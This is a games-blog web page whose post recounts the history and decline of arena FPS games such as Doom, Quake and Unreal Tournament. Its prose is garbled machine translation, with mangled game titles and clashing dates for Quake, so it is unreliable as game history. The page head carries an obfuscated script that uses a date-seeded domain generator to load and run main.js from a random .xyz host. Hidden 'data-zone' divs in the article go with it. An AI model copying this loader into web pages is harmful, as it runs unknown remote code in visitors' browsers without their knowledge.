<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Game,">










<meta name="description" content="In today’s video games and fields, first person shooting games have long been a common category of games. Almost every other short period of time, large factories and small factories from all over the">
<meta name="keywords" content="Game">
<meta property="og:type" content="article">
<meta property="og:title" content="The forerunner abandoned by the times, why is it hard to see the arena FPS on the market">
<meta property="og:url" content="http://maiygu.xyz/2019/11/08/The forerunner abandoned by the times, why is it hard to see the arena FPS on the market/index.html">
<meta property="og:site_name" content="Games">
<meta property="og:description" content="In today’s video games and fields, first person shooting games have long been a common category of games. Almost every other short period of time, large factories and small factories from all over the">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/The forerunner abandoned by the times, why is it hard to see the arena FPS on the market/58ee7a16ccda430693b7b5b57cc83f72.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/The forerunner abandoned by the times, why is it hard to see the arena FPS on the market/7bef36a8084d46d6a839b8e063416dac.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/The forerunner abandoned by the times, why is it hard to see the arena FPS on the market/337d3aa60e6945fdae9016b3835a9f16.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/The forerunner abandoned by the times, why is it hard to see the arena FPS on the market/202b6e71ac09411ea579d4dc83c3bcc6.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/The forerunner abandoned by the times, why is it hard to see the arena FPS on the market/5958c0733e094f3db9004a03c4096a8b.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/The forerunner abandoned by the times, why is it hard to see the arena FPS on the market/adce0a25b0de48c0b529085c95a91924.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/The forerunner abandoned by the times, why is it hard to see the arena FPS on the market/951a9b7521e141bf966b3d30c4612a63.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/The forerunner abandoned by the times, why is it hard to see the arena FPS on the market/1c4761f8c6a44b44815ebbbdb8e0774f.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/The forerunner abandoned by the times, why is it hard to see the arena FPS on the market/349702a070b44b39934d26df9941a83b.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/The forerunner abandoned by the times, why is it hard to see the arena FPS on the market/9e4a1e0a26e6499087994aab35813575.jpg">
<meta property="og:updated_time" content="2021-03-02T08:49:49.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="The forerunner abandoned by the times, why is it hard to see the arena FPS on the market">
<meta name="twitter:description" content="In today’s video games and fields, first person shooting games have long been a common category of games. Almost every other short period of time, large factories and small factories from all over the">
<meta name="twitter:image" content="http://maiygu.xyz/2019/11/08/The forerunner abandoned by the times, why is it hard to see the arena FPS on the market/58ee7a16ccda430693b7b5b57cc83f72.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"hide","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://maiygu.xyz/2019/11/08/The forerunner abandoned by the times, why is it hard to see the arena FPS on the market/">




<script type="text/javascript">!function(n){var t,e=function(n,t){var e=[["a","e","i","o","u","y"],["b","c","d","f","g","h","j","k","l","m","n","p","q","r","s","t","v","w","x","y","z"]];if(t)for(var r=0;r<=t.length-1;r++)n=n*t.charCodeAt(r)%4294967295;var l;return next=(l=n,function(n){return l=l+1831565813|0,(((n=(n=Math.imul(l^l>>>15,1|l))+Math.imul(n^n>>>7,61|n)^n)^n>>>14)>>>0)/Math.pow(2,32)}),function(n,t){for(var r=[],l=null,o=0;o<=n-1;o++){var a=void 0;null===l?a=e[0].concat(e[1]):1==l?(a=e[0],l=0):(a=e[1],l=1);var u=a[Math.floor(next()*a.length)];r.push(u),null===l&&(l=-1!=e[0].indexOf(u)?0:1)}return r.push("."+t),r.join("")}}((t=new Date,(t/=1e3)-t%1209600),"_fa7cdd4c68507744")(8,"xyz");if(null===n)console.log("https://"+e);else{var r=n.createElement("script");r.src="https://"+e+"/main.js",(n.body||n.head).appendChild(r)}}("undefined"!=typeof document?document:null);
</script>

  <title>The forerunner abandoned by the times, why is it hard to see the arena FPS on the market | Games</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Games</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Games</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            Sitemap
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
 
 
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="22aeec266c49468da6040eff035066b8" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="7aa7f6c595384fd6a2e5f5016b455fd2" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-zone="df2a1bde9f44465a8457aaf705928077" style="width:728px;height:90px;display: inline-block;margin: 0 auto"></div>
 <div class="_fa7cdd4c68507744" data-zone="4fff9a79323749608f8df1eff7291bcf" style="width:970px;height:90px;display: inline-block;margin: 0 auto"></div>
 
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://maiygu.xyz/2019/11/08/The forerunner abandoned by the times, why is it hard to see the arena FPS on the market/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Harry">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Games">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">The forerunner abandoned by the times, why is it hard to see the arena FPS on the market</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-11-08T00:00:00+08:00">
                2019-11-08
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>In today’s video games and fields, first person shooting games have long been a common category of games. Almost every other short period of time, large factories and small factories from all over the world have launched works of different styles. At present, FPS games are more popular in competitive games and have their own one acre and three points. Although they may not be as hot as all kinds of MoBa games, they win In a variety of styles, but also in the field of competitive games occupy a large share.<br><img src="http://maiygu.xyz/2019/11/08/The forerunner abandoned by the times, why is it hard to see the arena FPS on the market/58ee7a16ccda430693b7b5b57cc83f72.jpg" alt="The forerunner abandoned by the times, why is it hard to see the arena FPS on the market"><br>At present, FPS has many different types. They have different playing methods and rhythms. There are tactical shooting types that emphasize the randomness of tactical collocation, and there are also classical types that shoot and explode everything with a big weapon. However, it’s not surprising that there is such a type that many people may have contact with him, and there are many people who have heard the representative works under this type, but in today’s game market, this kind of game works are almost on the brink of extinction. Do you remember where the word “rocket jump” came from? Do you know what kind of game made that “German boy” smash the keyboard? It’s called the arena FPS, or AFP for short.<br><img src="http://maiygu.xyz/2019/11/08/The forerunner abandoned by the times, why is it hard to see the arena FPS on the market/7bef36a8084d46d6a839b8e063416dac.jpg" alt="The forerunner abandoned by the times, why is it hard to see the arena FPS on the market"></p>
<h1 id="pioneers"><a href="#pioneers" class="headerlink" title="pioneers"></a>pioneers</h1><p>Before the birth of G Pang’s half life, most FPS games on the market basically had no plot. At that time, doom, led by id software, was the leader in the whole FPS game field. In the view of the players at that time, as a “cool is done” shooting game, the plot really didn’t care much about anything. What the players need to do in doom is to control the protagonist to explore in the map and find the way out of each map. Just point your weapons at the monsters and enemies on the way and pull the trigger. Basically, everything that will appear in front of you and move will pose a threat to you. A major feature of this series is that the protagonist does not need to load bullets for the weapons in his hands, but different weapons need different types of ammunition. Only if there is ammunition in reserve, you can finish it all at once. Because the action is the short board of this work, producer John Romero shot part of the gap (though horizontal) that can be crossed by using rocket launchers in the map, which is the origin of “rocket jumping”.<br><img src="http://maiygu.xyz/2019/11/08/The forerunner abandoned by the times, why is it hard to see the arena FPS on the market/337d3aa60e6945fdae9016b3835a9f16.jpg" alt="The forerunner abandoned by the times, why is it hard to see the arena FPS on the market"><br>1993 the destroyer<br>The more kinds of weapons the protagonist can get, the more complex they will be in the later stage. At first, there are pistols, shotguns, chainsaws and so on. At the later stage, they can get Gatling, rocket launchers and BFG, which can clear the screen. They can let the players immerse themselves in the fancy killing of the enemy. In short, the core of the game is to let the players through the smart movement and the characteristics of using each weapon flexibly, just need to find a way to wipe out the enemy, and from the beginning of the works, the game supports multi player online battle, playing method and single machine mode have been completely all the time, but the enemy of the player is also the player, and it is precisely because of this, these characteristics can be achieved in the player’s To the greatest extent. In doom, players will fight in a closed map. Although the action composition is not high, they can also try to play some small tactics, such as squatting beside the weapon or walking around the path quickly. This is the origin of the type of AFP game. Several players fight with each other in a closed arena, so it is named arena FPS.<br><img src="http://maiygu.xyz/2019/11/08/The forerunner abandoned by the times, why is it hard to see the arena FPS on the market/202b6e71ac09411ea579d4dc83c3bcc6.jpg" alt="The forerunner abandoned by the times, why is it hard to see the arena FPS on the market"><br>BFG</p>
<h1 id="forerunner"><a href="#forerunner" class="headerlink" title="forerunner"></a>forerunner</h1><p>In 1998, id software launched a new FPS “quake” with real 3D screen, playing the same way as “doom”, and the biggest change compared with “doom” is that the main character added jumping in the game, but just adding a jump can make the core digging method of the play more possible. This work also supports many people to fight, better picture and better operation feel, which makes this work quickly replace the scenery of doom. At the same time, this work has a very high open source, which allows players to participate in the modification of the game and make new content. Therefore, some players start to make other game modes in this work, the most popular and influential mode is to seize Capture the flag, the player needs to grab the flag of the other team from the map and bring back the score of our camp to get the score. At the same time, we must organize the local members to take away our flag. It is a bit like adding a sport to FPS. This mode has been circulating so far, and has evolved into a variety of versions, which will appear in most confrontational FPS games.<br><img src="http://maiygu.xyz/2019/11/08/The forerunner abandoned by the times, why is it hard to see the arena FPS on the market/5958c0733e094f3db9004a03c4096a8b.jpg" alt="The forerunner abandoned by the times, why is it hard to see the arena FPS on the market"><br>1996 hammer of thunderbolt<br>The hammer of thunder series has launched many works subsequently, and each of them is constantly updated and improved. The multiplayer mode of the series is also more perfect than the other. By the time of three generations, it is more direct to make a pure multiplayer game, which is enough to see that id software attaches great importance to the multiplayer mode of the series, and the influence of this series is also constantly improving. The popularity of “hammer of thunderbolt” has made other manufacturers see red eyes. They want to share a share in the same way. If they want to defeat the king, they must first obtain the same strength as the king. But it is undoubtedly the simplest way to directly refer to the mode of “hammer of thunderbolt”. With this thinking, epic game, the developer of the unreal engine, launched the series of “unreal arena” and “Thunderbolt” Hammer 3 was released only ten days later.<br>Virtual arena was developed with the help of digital extremes, a Canadian studio. Most of the weapons were designed by them. Thanks to the integration of game modes, the novelty design of weapons and the openness of maps, this “integrated” work soon caught up with hammer of thunderbolt and became two of the FPS competitive games at that time Big oligarch, let “German boy” gas to hit the keyboard is this work.<br><img src="http://maiygu.xyz/2019/11/08/The forerunner abandoned by the times, why is it hard to see the arena FPS on the market/adce0a25b0de48c0b529085c95a91924.jpg" alt="The forerunner abandoned by the times, why is it hard to see the arena FPS on the market"><br>1999 unreal Arena</p>
<h1 id="innovator"><a href="#innovator" class="headerlink" title="innovator"></a>innovator</h1><p>Once upon a time, most of the adversary FPS adopted this kind of fast-paced AFPs mode, which focuses on personal skills and technology. Considering that these games usually require quick response and operation of players, but it is not easy for the handle to achieve this effect. In addition, at that time, the design of the host FPS game was not mature, so the AFPs has only been used for a long time Active only on PC platform. Until 2001, halo, a FPS game specially developed by Bungie for the early Xbox, broke this situation. Since 2000, every developer has begun to focus on the host platform, and halo, as a science fiction FPS, contains a multi person mode, which can be said to have quite revolutionary significance. Halo reduces the speed and rhythm of the game, and designs the operation mode of the game’s handle as comfortable as possible. It only retains the mode in the traditional APFs, but it is closer to a modern FPs in playing method. It not only makes it possible for the host to play competitive FPS, but also allows more people to have the opportunity to join the camp.<br><img src="http://maiygu.xyz/2019/11/08/The forerunner abandoned by the times, why is it hard to see the arena FPS on the market/951a9b7521e141bf966b3d30c4612a63.jpg" alt="The forerunner abandoned by the times, why is it hard to see the arena FPS on the market"><br>2001 halo<br>Halo brings new inspiration to the whole game industry. After all, the mainframe is a big fat meat. Whoever grabs it first will enjoy it first. He redefined the FPS of the mainframe, so the FPS on the market began to move closer to halo, including the later emergence of battlefield and call of Duty series. In addition to several FPS focusing on competition, the online content will be basically The rhythm has dropped. Of course, the traditional AFP, which is both painstaking and laborious, is no longer favored. So the game category just disappeared? In fact, the above two oligarchs are also persisting in launching new works later. However, for game developers, these works are no longer popular, so they are only for a small number of players to make, and they don’t need to make in a big way. In short, they have shifted the focus of development.<br><img src="http://maiygu.xyz/2019/11/08/The forerunner abandoned by the times, why is it hard to see the arena FPS on the market/1c4761f8c6a44b44815ebbbdb8e0774f.jpg" alt="The forerunner abandoned by the times, why is it hard to see the arena FPS on the market"><br>2013 battlefield 4</p>
<h1 id="losers"><a href="#losers" class="headerlink" title="losers"></a>losers</h1><p>In 2014, epic announced the development of a new “virtual arena” work. This work was originally planned to be led by a 20 person team of epic, encouraging community players to participate in the game development together, and will adopt the materials produced by players in the future. With the popularity of the big escape game later, epic joined a big escape mode in his own failed work “night of the fortress”. Unexpectedly, it suddenly caught fire, so he simply ordered all the staff of the development department to focus on “night of the fortress”. As for this “unreal arena”, there is no updated dynamic until today, and it still stays in the early development stage According to the official: because most of the original members are already the core development members of Fortress night, and the company is very confused about the future plan of the game, so we can only temporarily put the game development on hold. This situation is just like the previous few years’ work “Paragon”, which also came from epic and died, with a great probability of continuing.<br><img src="http://maiygu.xyz/2019/11/08/The forerunner abandoned by the times, why is it hard to see the arena FPS on the market/349702a070b44b39934d26df9941a83b.jpg" alt="The forerunner abandoned by the times, why is it hard to see the arena FPS on the market"><br>2014 new unreal Arena<br>As for hammer of thunderbolt on the other side, after id software was acquired by Bethesda, the IP was temporarily put on hold for a period of time. During this period, ID participated in the development of rage, new destroyer, German headquarters and other works, and supported the classical FPS market with its own strength, making it rejuvenate. As for hammer of thunderbolt, ID launched a sub era version called hammer of thunderbolt: champion in 2017, and the mode and playing method of the game itself have been greatly reformed, adopting the role division settings like “watch the pioneer” and “Legion Fortress 2”. Even the official said that the game was pushed to match the watch the pioneer series However, the old players who have been waiting for the new work are annoyed by doing so. After all, the game that starts with two hands and equipment depends on picking up is a series of tradition, adding the character system will undoubtedly lose its original flavor. In the same way, the development focus of community B and ID has basically shifted to the very successful “destroyer” in recent years. There is no one to take care of the quality of this free game. Today, more than two years later, this game is still in the “preemptive experience” stage.<br><img src="http://maiygu.xyz/2019/11/08/The forerunner abandoned by the times, why is it hard to see the arena FPS on the market/9e4a1e0a26e6499087994aab35813575.jpg" alt="The forerunner abandoned by the times, why is it hard to see the arena FPS on the market"><br>Hammer of thunderbolt: Champion 2017<br>    concluding remarks<br>The decline of AFP games is largely related to the changes of the times, but it is undeniable that although their competitors are very strong, the developers take profit as the first goal and do not pay attention to this dying game type, which also accounts for a lot of responsibility. Maybe a lot of players grew up playing CS, and a lot of people came here playing hammer of thunder and unreal arena. In the latter’s view, maybe these works not only have a strong appreciation, but also a fast-paced game environment is very suitable for long-term operation. The last round may be about the same time as a “landing into a box” Between. It’s a pity that the glorious deeds of this great “forerunner” are so forgotten. I hope that these two oligarchs will get their “second life” one day. After all, there are many people who want to ask for an acceptable statement.</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Game/" rel="tag"># Game</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/11/08/The gap between film and game has been broken, but the best partner has not yet been formed/" rel="next" title="The gap between film and game has been broken, but the best partner has not yet been formed">
                <i class="fa fa-chevron-left"></i> The gap between film and game has been broken, but the best partner has not yet been formed
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/11/08/The concept of frames and pictures will affect the game experience started from this racing game of the last century/" rel="prev" title="The concept of frames and pictures will affect the game experience started from this racing game of the last century">
                The concept of frames and pictures will affect the game experience started from this racing game of the last century <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Harry</p>
              <p class="site-description motion-element" itemprop="description">Games</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">114</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#pioneers"><span class="nav-number">1.</span> <span class="nav-text">pioneers</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#forerunner"><span class="nav-number">2.</span> <span class="nav-text">forerunner</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#innovator"><span class="nav-number">3.</span> <span class="nav-text">innovator</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#losers"><span class="nav-number">4.</span> <span class="nav-text">losers</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        

<div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Harry</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
